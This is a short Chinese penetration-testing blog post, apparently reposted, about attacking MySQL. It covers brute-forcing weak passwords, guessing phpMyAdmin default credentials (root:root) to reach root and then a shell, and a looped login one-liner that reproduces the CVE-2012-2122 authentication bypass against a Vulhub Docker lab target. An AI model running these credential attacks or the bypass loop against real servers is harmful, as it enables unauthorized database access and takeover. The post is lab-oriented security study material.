WEB渗透之数据库安全——MySQL

WEB渗透之数据库安全——MySQL,第1张

意识薄弱-弱口令爆破

安全机制-特定安全漏洞

0x00

MySQL默认配置root用户禁止外连

就算爆破出正确用户名密码也无法登录,如果爆破出非root用户账号密码,价值也不大

所以如果目标网站部署了phpMyAdmin,找到phpMyAdmin目录(如果使用phpStudy,phpMyAdmin默认在WWW文件夹下)

 

然后可以猜解phpMyAdmin(默认账号密码为root:root)来实现外部连接MySQL root用户。

 接下来的拿shell *** 作推荐看这篇文章:

        phpMyAdmin拿shell的两种方法 - -冰封 - 博客园 (cnblogs.com)

个人建议能用文中上述两种方法解决就不要用慢查询日志写入shell,本来phpMyAdmin响应就比较慢,还要sleep延时这谁顶得住啊

0x01

CVE-2012-2122   Mysql 身份认证绕过漏洞

参考网址:Vulhub - Docker-Compose file for vulnerability environment

在Ubuntu中搭建docker虚拟靶场后运行第一行代码启动环境

接着在另一台虚拟机上运行第二行代码利用for in循环对靶机实施漏洞复现(将target_ip改为虚拟机IP)

docker-compose up -d
for i in `seq 1 1000`; do mysql -uroot -pwrong -h target_ip -P3306; done

如何查看靶机IP:

输入ifconfig后取ens33(后面的数字不同机器可能会有出入)中的IP地址

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/719310.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-25
下一篇 2022-04-25

发表评论

登录后才能评论

评论列表(0条)

保存